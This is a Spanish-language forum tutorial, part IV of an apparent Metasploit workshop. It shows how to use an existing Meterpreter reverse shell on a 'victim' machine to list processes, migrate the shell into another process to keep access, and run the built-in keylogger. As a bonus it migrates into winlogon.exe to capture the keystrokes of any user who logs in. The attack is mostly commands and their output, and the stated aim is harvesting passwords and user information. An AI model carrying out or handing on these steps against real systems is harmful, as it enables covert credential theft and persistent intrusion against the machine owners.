+Temario
-+¿Que es el keylogging?
-+¿Keylogging con meterprete?
-+¿Que es migrate?
-+Usando migrate
-+Comando getpid
-+Keylogger
-+Keylogger dump
-+Migrate keylogger
-+Clonclusion
- Bueno en las primeras III partes del taller pudimos obtener
la revers shell Meterpreter en nuestra victima (mi caso)
y ahora les voy a enseñar a hacer unas tecnicas que nos seran
muy utiles para poder no perder la session que y alogramos
y algunas otras cosas interesantes.
- Beno pues su nombre lo dice y creo que todo en el foro
conoseran un keyloger pero no en este modo cuando consegimos
un revers shell meterpreter realmente tenemos una alta gama
de herramientas para poder obtener informacion sobre nuestra victima
y a si mismo poder tener una mejor session de pentesting.
+¿Keylogging con meterprete?
- Asi es como lo mencione chico tenemos una alta gama de "jugetes"
cuando obtenemos una meterpreter shell y bueno uno de estos jugetes
es el keylogger que nos ofrece meterpreter es perfecto para obtener
contraseñas usuarios informacion de la victima.
+¿Que es migrate?
- Tambien es un muy buen comando que nos ofrece la shell meterpreter
y nos sirve para migrar nuestra shell al un proceso especifico
y esto nos si por ejemplo se pierde la conexion podamos remota la
session y no tengamos que hacer todo de nuevomuy util no?
- bueno ahora vamos a usar el comando migrate dentro de nuestra
shell meterpreter y vamos a migrar nuestra shell para no
perder la conexion ya que esto nos ayuda bastante para nuetsro
fines....
Vamos a nuestra session de metasploit y bueno ya teniendo acceso
al objetivo tecleamos lo sigiente...
Código: Seleccionar todo
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
516 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
572 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
596 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
640 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
652 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
796 ibmpmsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\ibmpmsvc.exe
832 ati2evxx.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\Ati2evxx.exe
852 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
940 svchost.exe x86 0 NT AUTHORITY\Servicio de red C:\WINDOWS\system32\svchost.exe
1004 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1132 svchost.exe x86 0 NT AUTHORITY\Servicio de red C:\WINDOWS\system32\svchost.exe
1180 svchost.exe x86 0 NT AUTHORITY\SERVICIO LOCAL C:\WINDOWS\system32\svchost.exe
1392 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1492 TPHKSVC.exe x86 0 NT AUTHORITY\SYSTEM C:\Archivos de programa\LENOVO\HOTKEY\TPHKSVC.exe
1600 AppleMobileDeviceService.exe x86 0 NT AUTHORITY\SYSTEM C:\Archivos de programa\Archivos comunes\Apple\Mobile Device Support\AppleMobileDeviceService.exe
1612 mDNSResponder.exe x86 0 NT AUTHORITY\SYSTEM C:\Archivos de programa\Bonjour\mDNSResponder.exe
1724 nod32krn.exe x86 0 NT AUTHORITY\SYSTEM C:\Archivos de programa\Eset\nod32krn.exe
1824 SMAgent.exe x86 0 NT AUTHORITY\SYSTEM C:\Archivos de programa\Analog Devices\SoundMAX\SMAgent.exe
1876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
424 alg.exe x86 0 NT AUTHORITY\SERVICIO LOCAL C:\WINDOWS\System32\alg.exe
328 ati2evxx.exe x86 0 ONWER_IBM\SYSTEM C:\WINDOWS\system32\Ati2evxx.exe
1040 explorer.exe x86 0 OWNER_IBM\SYSTEM C:\WINDOWS\Explorer.EXE
1816 TpShocks.exe x86 0 OWNER_IBM\SYSTEM C:\WINDOWS\system32\TpShocks.exe
1736 EZEJMNAP.EXE x86 0 OWNER_IBM\SYSTEM C:\ARCHIV~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe
1776 rundll32.exe x86 0 OWNER_IBM\SYSTEM C:\WINDOWS\system32\RunDll32.exe
1540 AGRSMMSG.exe x86 0 OWNER_IBM\SYSTEM C:\WINDOWS\AGRSMMSG.exe
2016 TPOSDSVC.exe x86 0 OWNER_IBM\SYSTEM C:\Archivos de programa\Lenovo\HOTKEY\TPOSDSVC.exe
2064 iTunesHelper.exe x86 0 OWNER_IBM\SYSTEM C:\Archivos de programa\iTunes\iTunesHelper.exe
2136 TPONSCR.exe x86 0 OWNER_IBM\SYSTEM C:\Archivos de programa\Lenovo\HOTKEY\TPONSCR.exe
2228 jusched.exe x86 0 OWNER_IBM\SYSTEM C:\Archivos de programa\Java\jre1.6.0_03\bin\jusched.exe
2248 TpScrex.exe x86 0 JULIAN_IBM\SYSTEM C:\Archivos de programa\Lenovo\Zoom\TpScrex.exe
2256 ctfmon.exe x86 0 OWNER_IBM\SYSTEM C:\WINDOWS\system32\ctfmon.exe
2296 msnmsgr.exe x86 0 OWNER_IBM\SYSTEM C:\Archivos de programa\Windows Live\Messenger\msnmsgr.exe
2436 nod32kui.exe x86 0 OWNER_IBM\JSYSTEM C:\Archivos de programa\Eset\nod32kui.exe
2916 iPodService.exe x86 0 NT AUTHORITY\SYSTEM C:\Archivos de programa\iPod\bin\iPodService.exe
1104 wlcomm.exe x86 0 OWNER_IBM\SYSTEM C:\Archivos de programa\Windows Live\Contacts\wlcomm.exe
1760 jucheck.exe x86 0 JOWNER_IBM\SYSTEM C:\Archivos de programa\Java\jre1.6.0_03\bin\jucheck.exe
meterpreter >
- Vemos los procesos y bueno elegimos uno para migrarlo
Código: Seleccionar todo
meterpreter > migrate 2064
[*] Migrating to 2064...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 2064
- Bueno simple nos sirve para ver en que nuemero de proceso esta
alojado nuestro shell ...
- Bueno ahora si vamos aver como lanzar el keylogger para poder
ver las capturas de la victima.
Código: Seleccionar todo
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter >
- Bueno con este comando lanzamos el keylogger y esperamos
un rato o segundos como ustedes quieran y vamos a hacer
el dump al keylogger para que nos de lo que guardo...
Código: Seleccionar todo
meterpreter > keyscan_dump
Dumping captured keystrokes...
prueba para indetectables.net
+Migrate keylogger
- Bueno y si quieres un bonus jejeje vamos a migrar el proceso
para capturar todo lo que escriban cualquier usuario que inicie
session mientras el sistema se este ejecutando...
Código: Seleccionar todo
meterpreter > ps
Process list
============
PID Name Path
--- ----
0 [System Process]
47 winlogon.exe C:\WINT\system32\winlogon.exe
meterpreter > migrate 47
[*] Migrating to 47...
[*] Migration completed successfully.
- Y bueno hasta aquile dejamosla parte IV
espero vayan aprendiendo cada vez un poco mas
de esta pontente herramienta metasploit saludos
esperen la part V.